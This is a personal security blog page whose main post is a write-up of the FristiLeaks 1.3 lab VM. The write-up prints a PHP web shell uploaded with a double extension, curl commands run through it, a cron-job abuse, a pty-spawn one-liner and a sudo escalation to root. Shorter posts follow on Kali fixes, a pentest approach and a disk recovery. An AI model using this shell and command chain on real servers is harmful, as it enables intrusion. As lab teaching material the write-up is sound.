Saturday 19 December 2015

[Vulnhub] Fristileaks: 1.3

Thanks Ar0xA for this "vuln"derful image.
This is my second completely self-solved vulnhub image and my first write-up. So cheers fellow #vulnhub fellas. \m/

Setup

 My (attacker) IP: 192.168.56.102  
 Vulnerable Image IP: 192.168.56.103  
 Software setup: Oracle VirtualBox on Kali 2.0  

Recon

Like any other challenge, we begin using our classic nmap -

 nmap -A -p- 192.168.56.103 -oA fristileaks  

With this we were able to enumerate the image and found out that only port 80 was open showing us -



However, the interesting part of this was the availability of robots.txt with 3 directories (/cola, /sisi, /beer), all of which had the same result - This is not the url you were looking for!

This was the guessing game part of vulnhub images. Unlike my previous challenge, this time I thought I knew what most of my guesses needed to be, and voila, we got the right drink - fristi.

/fristi



After this came the obvious step of looking into the source code

 <meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">  
 <!--   
 TODO:  
 We need to clean this up for production. I left some junk in here to make testing easier.  
 - by eezeepz  
 -->  


At the bottom of the page we found a small base64-encoded snippet,
which obviously decoded to this image.


 <!--   
 iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx  
 jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl  
 S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw  
 B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f  
 m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ  
 Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb  
 DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd  
 jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU  
 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5  
 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1  
 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq  
 i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg  
 tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws  
 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl  
 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK  
 ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q  
 mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34  
 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe  
 EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH  
 AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk  
 CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR  
 U5ErkJggg==  
 -->  






This leads us to 
By now we can all guess who the user is and what his password would be. 

/home/eezeepz

After logging in, the harder portion of the 4 hours started. We now find a file upload page.
From the enumeration, we knew the server was Apache 2.2.15 running with PHP 5.3.3.
This meant the most common file-upload misconfiguration was likely present: an upload filter that accepts a name like x.php.png as an image, while the server still executes it as PHP.
I quickly wrote a 5 line script and uploaded it on the server.

 <?php  
 if(isset($_REQUEST['cmd'])){  
   $cmd = ($_REQUEST["cmd"]);  
   system($cmd);  
   echo "</pre>$cmd<pre>";  
   die;}  
 ?>  

The best way to get output from this shell is via curl -
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=ls"  
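To show what the double-extension problem looks like from the defender's side, here is an added Python example (my own code, not the author's script and not the upload filter that actually ran on the box, which the write-up does not show). It assumes an image allow-list of .png/.jpg/.jpeg/.gif and contrasts a typical weak check, which accepts a name if an image extension appears anywhere in it, with a strict one that permits exactly one extension from the allow-list and a safe stem, plus a server-chosen stored name:

```python
import os
import re

# Illustrative allow-list; the box's actual upload filter is not shown on
# the page, so this set is an assumption standing in for a typical image check.
ALLOWED_IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}


def weak_upload_check(filename):
    """Typical weak filter: accepts a name if an allowed image extension
    appears anywhere in it, so 'shell.php.png' is treated as an image."""
    lowered = filename.lower()
    return any(ext in lowered for ext in ALLOWED_IMAGE_EXTENSIONS)


def strict_upload_check(filename):
    """Hardened filter: exactly one extension, taken from the allow-list,
    and a stem made only of safe characters. A second extension such as
    the '.php' in 'shell.php.png' is rejected outright, which matters on
    Apache/mod_php hosts where a file can be run as PHP because of a .php
    segment even when another extension follows it."""
    base = os.path.basename(filename)
    stem, ext = os.path.splitext(base)
    if ext.lower() not in ALLOWED_IMAGE_EXTENSIONS:
        return False
    # No dots allowed in the stem, which kills every double extension.
    return re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem) is not None


def stored_name(filename, counter):
    """Decouple the stored name from user input entirely: keep only the
    validated extension and choose the stem server-side. Returns None
    when the upload fails the strict check."""
    if not strict_upload_check(filename):
        return None
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return "upload_%06d%s" % (counter, ext)


def triage(filenames):
    """Run both filters over a list of names; returns name -> (weak, strict)."""
    return {name: (weak_upload_check(name), strict_upload_check(name))
            for name in filenames}


if __name__ == "__main__":
    # Constructed sample names, including the write-up's shell.php.png.
    for name, verdict in triage(["shell.php.png", "photo.png", "shell.php",
                                 "a b.png", "IMG_001.JPG"]).items():
        print("%-14s weak=%-5s strict=%s" % (name, verdict[0], verdict[1]))
```

Name checks alone are only half of the fix: the upload directory should also be served with script execution disabled, so that a file which slips through is returned as static bytes rather than run.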

/home/admin

Somehow I didn't mind this interface and didn't bother getting a reverse TCP connection until a later stage.
After this, I went through the regular directory traversal techniques until I found:

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat ../../../notes.txt"  
 hey eezeepz your homedir is a mess, go clean it up, just dont delete  
 the important stuff.  
 -jerry  
 </pre>cat ../../../notes.txt<pre>  


After going to /home/eezeepz and analyzing the contents, I got hold of
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/eezeepz/notes.txt"  
 Yo EZ,  
 I made it possible for you to do some automated checks,   
 but I did only allow you access to /usr/bin/* system binaries. I did  
 however copy a few extra often needed commands to my   
 homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those  
 from /home/admin/  
 Don't forget to specify the full path for each binary!  
 Just put a file called "runthis" in /tmp/, each line one command. The   
 output goes to the file "cronresult" in /tmp/. It should   
 run every minute with my account privileges.  
 - Jerry  
 </pre>cat /home/eezeepz/notes.txt<pre>  



Trying to traverse into /home/admin/ gave me a *Permission Denied* error. So, going through the last half of this message again, the path was pretty clear.
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo 'chmod 777 /home/admin'>/tmp/runthis"  


Unfortunately, this attempt failed because we didn't read the entire message.
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"  
 command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin  

So retrying,
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo '/home/admin/chmod 777 /home/admin'>/tmp/runthis"  

We get,

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"  
 command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin  
 executing: /home/admin/chmod 777 /home/admin  

Aha. Now we could go into the /home/admin directory.
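The two cronresult outputs above are exactly what a line-prefix allow-list produces. As an added example (my own Python, not the cron script that actually ran on the box, whose code the write-up never shows), here is a re-creation of the check Jerry's note describes, alongside a stricter variant that resolves the binary path before comparing. Everything below only classifies lines; nothing is executed:

```python
import os

# Constructed re-creation of the allow-list from Jerry's note: each line of
# /tmp/runthis is accepted only if it starts with /home/admin or /usr/bin.
ALLOWED_DIRS = ("/home/admin", "/usr/bin")
REJECT_MSG = "command did not start with /home/admin or /usr/bin"


def check_line_prefix(line):
    """Prefix check as the note describes it. Returns the message that
    would be appended to cronresult for this line."""
    cmd = line.strip()
    if any(cmd.startswith(d) for d in ALLOWED_DIRS):
        return "executing: " + cmd
    return REJECT_MSG


def process_runthis(text):
    """Apply the prefix check to every non-empty line of a runthis body."""
    return [check_line_prefix(l) for l in text.splitlines() if l.strip()]


def check_line_hardened(line):
    """Stricter variant (an assumption of this example, not the box's
    code): normalise the first token and require it to be an absolute
    path whose parent directory is one of the allowed ones, so a textual
    prefix alone is not enough."""
    parts = line.strip().split()
    if not parts:
        return REJECT_MSG
    binary = os.path.normpath(parts[0])
    if os.path.isabs(binary) and os.path.dirname(binary) in ALLOWED_DIRS:
        return "executing: " + " ".join([binary] + parts[1:])
    return REJECT_MSG


if __name__ == "__main__":
    # The two attempts from this write-up, as a constructed runthis body.
    sample = "chmod 777 /home/admin\n/home/admin/chmod 777 /home/admin\n"
    for msg in process_runthis(sample):
        print(msg)
```

Either check only restricts which binary gets launched, not what it is allowed to do: /home/admin/chmod passes the filter and still changes the permissions of /home/admin, which is the whole point of this step. Running such a dispatcher with the account's full privileges is the real weakness; a dedicated low-privilege user for the cron job would have limited the damage.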

/home/fristigod

Analyzing the contents of this directory, we could see a few interesting files -

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptedpass.txt"
 mVGZ3O3omkJLmy2pcuTq  
 </pre>cat /home/admin/cryptedpass.txt<pre>  

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptpass.py" 
 #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn  
 import base64,codecs,sys  
 def encodeString(str):  
     base64string= base64.b64encode(str) 
     return codecs.encode(base64string[::-1], 'rot13')
 cryptoResult=encodeString(sys.argv[1])
 print cryptoResult
 </pre>cat /home/admin/cryptpass.py<pre> 
 
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/whoisyourgodnow.txt"  
 =RFn0AKnlMHMPIzpyuTI0ITG
 </pre>cat /home/admin/whoisyourgodnow.txt<pre>  

Quickly writing a decoding program (I edited the same program, hence no naming convention followed):

 $ cat decryptpass.py
 #!/usr/bin/python
 import base64,codecs,sys
 def encodeString(str):
     # rot13 is its own inverse (26 letters, shift of 13), and reversing the
     # string undoes the [::-1] of the encoder, so this recovers the base64
     base64string = codecs.encode(str[::-1], 'rot13')
     return base64.b64decode(base64string) # base64 decoding
 cryptoResult=encodeString(sys.argv[1])
 print(cryptoResult.decode())


So decrypting the results -

 $ python decryptpass.py mVGZ3O3omkJLmy2pcuTq
 thisisalsopw123
 $ python decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
 LetThereBeFristi!
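As an added example (my own Python 3 code, not the box's cryptpass.py and not the author's decoder above), here are the encoder and its inverse side by side, so the round trip can be verified against the two strings recovered from /home/admin:

```python
import base64
import codecs


def encode_password(plain):
    """Same transformation as the box's cryptpass.py: base64-encode the
    text, reverse the result, then rot13 the letters."""
    b64 = base64.b64encode(plain.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot_13")


def decode_password(token):
    """Exact inverse. rot13 is its own inverse and only touches letters,
    so applying it again and un-reversing yields the original base64,
    which then decodes to the plaintext. No key is involved anywhere,
    which is why this is an encoding rather than encryption."""
    b64 = codecs.encode(token, "rot_13")[::-1]
    return base64.b64decode(b64).decode("utf-8")


def round_trips(plain):
    """True when encode followed by decode returns the input unchanged."""
    return decode_password(encode_password(plain)) == plain


if __name__ == "__main__":
    # The two tokens from the write-up, used here as a constructed check.
    for token in ("mVGZ3O3omkJLmy2pcuTq", "=RFn0AKnlMHMPIzpyuTI0ITG"):
        print(token, "->", decode_password(token))
```

The leading "=" in the second token is ordinary base64 padding that the reversal moved to the front; spotting it is the quickest giveaway that a reversed base64 string is involved.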


So now that we have two sets of passwords, we try them on the user accounts. On accessing the /home/ directory, we saw three user profiles - admin, eezeepz and fristigod. The only major problem was that to run a sudo command and elevate privileges I would require a tty, for which I needed a stable reverse shell and not only a PHP web shell. After attempting to build a custom simple shell and failing multiple times (netcat and telnet were not there on the system, so I was trying to get a PHP or Python reverse TCP connection), I just switched back to my script kiddie nature and used php-reverse-shell to get access into the machine.

/root/

Launching a tty to escalate privileges with sudo can be done with the python one liner (Thank you Pentest monkey, again)

 $ python -c 'import pty; pty.spawn("/bin/sh")'

After this I was able to figure out the credentials of admin(thisisalsopw123) and fristigod(LetThereBeFristi!).
My hope of admin being the sudo user was dashed, and on running find / -perm -4000 I pretty much got the idea who the sudo user is (last line - find: `/var/fristigod': Permission denied).

After su fristigod, I ran find / -perm -4000 to find

 /var/fristigod/.secret_admin_stuff/doCom

Unfortunately,
 bash-4.1$ ./var/fristigod/.secret_admin_stuff/doCom 
 ./var/fristigod/.secret_admin_stuff/doCom 
 Nice try, but wrong user ;) 

Traversing into the directory, I figured doCom was accessible only with root perms, but the perms on this folder were given to fristigod. This was the obvious point of escalation. Hence I tried harder,

 bash-4.1$ sudo ./doCom  
 sudo ./doCom
 Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain. 

At this point I knew I had to run it as a different user. On analyzing /etc/passwd I saw a user named fristi. I knew this was the user. However, I still ran

 bash-4.1$ sudo -l
 sudo -l
 Matching Defaults entries for fristigod on this host:
  requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
  DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
  PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
  LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
  LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
  LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
  secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 User fristigod may run the following commands on this host:
  (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom   

This was the confirmation. The next command gave me access to this file

 bash-4.1$ sudo -u fristi ./doCom
 sudo -u fristi ./doCom
 Usage: ./program_name terminal_command ...

This was simple now,

 bash-4.1$ sudo -u fristi ./doCom /bin/bash
 sudo -u fristi ./doCom /bin/bash 
 bash-4.1# id  
 id
 uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Pwn'd. Now for the flag -


 bash-4.1# cd /root  
 cd /root  
 bash-4.1# ls   
 ls  
 fristileaks_secrets.txt  
 bash-4.1# cat fristileaks_secrets.txt  
 cat fristileaks_secrets.txt  
 Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]  
 I wonder if you beat it in the maximum 4 hours it's supposed to take!  
 Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)  
 Flag: Y0u_kn0w_y0u_l0ve_fr1st1  

And w00t w00t! Fristileaks solved within 4 hours :)
Hope to continue pwn'ing such challenges from Vulnhub.

Monday 14 September 2015

[Penetration Testing] Pwn without Payloads

The normal procedure of any black box penetration testing or hacking project is generally dependent on the procedures of exploitation. Most clients would get freaked out if you ran payloads on their machines. And even when payloads are available, we often cannot tell in advance whether they would function correctly or whether they would harm a system in a way that impacts the production system you run them on.

Problems faced during black box penetration testing


Too strict configuration of security policies - This sure is a good way to keep off script kiddies, but if mis-configured it can also lead to a Denial of Service for the entire internal network.
Leaving the above problem alone, I remember one of my colleagues getting called on his mobile by the SOC team of a client and asked to explain why he was attacking the network (Yes! Not only did they trace the attacks back to him, they were also able to retrieve his mobile information - pro hax0r pwn'd).
So being too noisy in an internal penetration test would sometimes not only get you into the denial of service zone, it would also compromise your identity and disrupt your entire engagement.

Another HUGE problem of being a black-box pentester is the "No exploits must be run" statement by the client. This statement would be great for a Compliance Audit or Compliance Review; in a black-box pentest, however, it feels stupid. However, clients "pay".

Pwning without Payloads


Since those incidents and requirements, I realized the importance of being more silent and less violent and malicious in the network, especially during a black box penetration test.

A typical penetration testing life cycle would include -
Information Gathering - Service Enumeration - Penetration - Maintaining Access - Housekeeping

Our approach in a black box penetration test -
Intelligence Gathering - Information Gathering + Service Enumeration = 80% of our work (40% for entry point)
Penetration = 5% of our work
Lateral Movement = 55% of our work (40% intelligence gathering post exploitation + 15% penetration into the crown of the network)

Typically, Maintaining Access is never required in our internal penetration tests, and hence very little Housekeeping is needed.

Intelligence Gathering (Information Gathering and Service Enumeration) - (40%)


My colleague and friend Vijay Kumar (bitvijays) has a good blog written for the Intelligence Gathering phase of a black box penetration test. It basically involves Active fingerprinting, passive fingerprinting, Internal infrastructure mapping, and sometimes employee reconnaissance.

Penetration - (5%)


The penetration phase would include less of exploitation. Most of our compromise would be done using the following two techniques.

LLMNR and NBT poisoning
Extracting Windows credentials (locally)

Lateral Movement (55%)


A combination of further Intelligence gathering and penetration using the following two techniques.

Powershell Enumeration (40% worth of intelligence gathering)
Gaining access to the Crown  (15% worth penetration)

Most black box penetration tests would be successful with just these techniques, since the architecture of every enterprise trusts anyone or anything in the physical location, without proper segregation.

I would be uploading demonstrations of all these processes slowly, one by one. I am also working on a script that could automate most of the process. But these would take some time.
So, those interested in these topics can feel free to get in touch with me for a faster reply on how to launch these attacks.

Saturday 12 September 2015

[Quick-Fix] Kali 2.0 wireless bug

So even after a fresh install of Kali Linux 2.0, a few of the applications still seem buggy. One of them would be the wireless hacking module airmon-ng.
Ok! So while I was trying to sniff the networks around my hotel, I faced this bug with airmon-ng and spent a good half an hour trying to understand what was going wrong, as the tool-based world gets you so addicted to the tools that you are sometimes misled by the errors.

This bug occurs while trying to sniff wireless traffic after attempting to set the wireless network card into Monitoring Mode.
~# airmon-ng start wlan0
...
~# airodump-ng wlan0mon
ioctl(SIOCSIWMODE) failed: Device or resource busy

This error occurs because airmon-ng creates the wlan0mon interface but fails to actually put the wireless card into monitor mode. Hence the quick resolution is to set the card into monitor mode manually with iwconfig.

~# ifconfig wlan0mon down
~# iwconfig wlan0mon mode monitor
~# ifconfig wlan0mon up
~# airodump-ng wlan0mon

And, tadaaaaaaaaaaaaaaaaaaaaaa......!!!!!!!
This should get your wireless cards into sniffing mode and then happy hacking to you folks.

Update:
Another way to get this running (I guess this is the official solution that I saw in kali forums) -

~# airmon-ng check kill




Have Fun with the WiFu.

Tuesday 18 August 2015

[Quick-Fix] Kali 1.1 to Kali 2.0 update bug

A few hours ago I tried to upgrade my Kali 1.1.0 to the new and beautiful looking Kali 2.0 the apt-get update && apt-get dist-upgrade way. The result was as terrible as I had expected: a complete crash with only this message.
Oh no! Something has gone wrong.
A problem has occurred and the system can't recover.
Please log out and try again.
A terrible feeling when the grey page looks at your face and your head says to you,
"hah you should have rather done a fresh install and wasted 10 hours from your life taking a backup and reformatting your LVM encrypted system."

Here is a small bypass for all the folks who, like me, are just going to wait for the guys behind Kali to fix this issue.

Ok, firstly open the below file in an editor
root@kali:~# nano /etc/gdm3/daemon.conf

Now add the following two lines. These enable the system to auto log into the non-root user after booting up. I still haven't completed the debugging process and hence am not able to give the exact reason for this error.
AutomaticLoginEnable = true
AutomaticLogin = <Non-root Username>

Enabling automatic login for the root user is not recommended, and it will not work for the root user anyway.

Friday 31 July 2015

[Gyan/ Knowlege] From Con to Consultant

Among my recent promises to myself to write blogs, get certifications, etc., my venture into the hacker world, participating in and topping the table of capture the flag events, secured me the position of a Penetration Tester in one of the Big Four firms. In the past few months, from being a random hackerboy on the internet who gained pocket money from bug bounties and fame from free goodies, there was a sudden drift to convert into an absolute and perfect human. This drift from fame to money, from loose shirts and jeans to walking in suits (Nope, the NSA aren't the only ones that wear suits), has probably been the most incredible journey of my life.

Even though incredible, the life change from a hackerboy to a corporate man is terrible. It is as if a burden of responsibilities you had specifically avoided till today suddenly grasps hold of you and pulls you down. The expectation of decorum and maturity in a person is like a sea-water fish suddenly finding itself in the depths of the Pacific Ocean. However, having the unusual luck of working under the guidance of the top levels of the organization (Yup! My first project and I get to learn from the best) made me push harder and harder until I realized I could pull myself up, stand face to face, look into their eyes and say, "Look my good Sir! I exist!". To my utter surprise, the motivation, the energy and the vibe spread by these top level folks are astonishingly awesome and the attention you are given seemed particularly amazing (Yes! When people with 15+ years of industry experience look up at you and say good work - now feel my feeling).

Consultants are often looked up to as all-knowledgeable folks, who have extreme knowledge especially in what they do. Keeping up with these expectations is particularly hard, but then the challenge involved in it is what keeps you on your toes and learning. With an extremely techie security consulting astronomer (Yes. WTH?!) I was able to increase my Linux skills, and with the guidance of an ever hardworking manager I am still shaping up to become a total corporate guy. However, this journey from fame to money, deepweb to whiteweb, blackhat to whitehat, hacker to penetration tester, con to consultant is an extremely exciting and learning-filled transition, especially for all those Kevin Mitnicks who love to social engineer out there. Because remember,
If you can't sell it, don't bother making it.

Friday 13 March 2015

[Trick] Fixing External Hard Disk Drive and Recover data

My very first personal External Hard Disk Drive of 500 GB, which I won at a competition, abruptly decided to change its format into RAW, refusing to give me access to the drive. I pretty much choked on this fact because I hadn't kept any kind of backup of this drive and wasn't ready to give up on the contents this drive had and its esthetic value. A lot of searching on numerous websites led me to find enormous ways to reformat the disk partition into NTFS. However, I soon realized that instead of the diskpart measure to totally format the disk, chkdsk did a better job in analyzing the disk and recovering it into its previous state. The recovery follows three simple steps.

Step 1: Open your disk management window

First <Windows Key> + R, then open diskmgmt.msc


Step 2: Analyse the File Systems and the Partitions

Here you need to see which file system needs to be rectified. In this partition, you can format, rename, change drive letters and paths, explore, and play around with all the partitions easily.
My hard disk here is the H: partition that brilliantly changed its file system format to RAW, causing me a lot of inconvenience.



Step 3: CHKDSK

Chkdsk is available only when you open your DOS prompt in Administrator mode. To do this, you can open your windows explorer, go to
file>open command prompt> Open Command Prompt as administrator
Now when the window opens up, quickly type in

chkdsk /f <desired drive letter>

And that is it. Your hard work (actually my hard work at 2 am) is complete. Drum Roll........... *Ba Dum Tuss*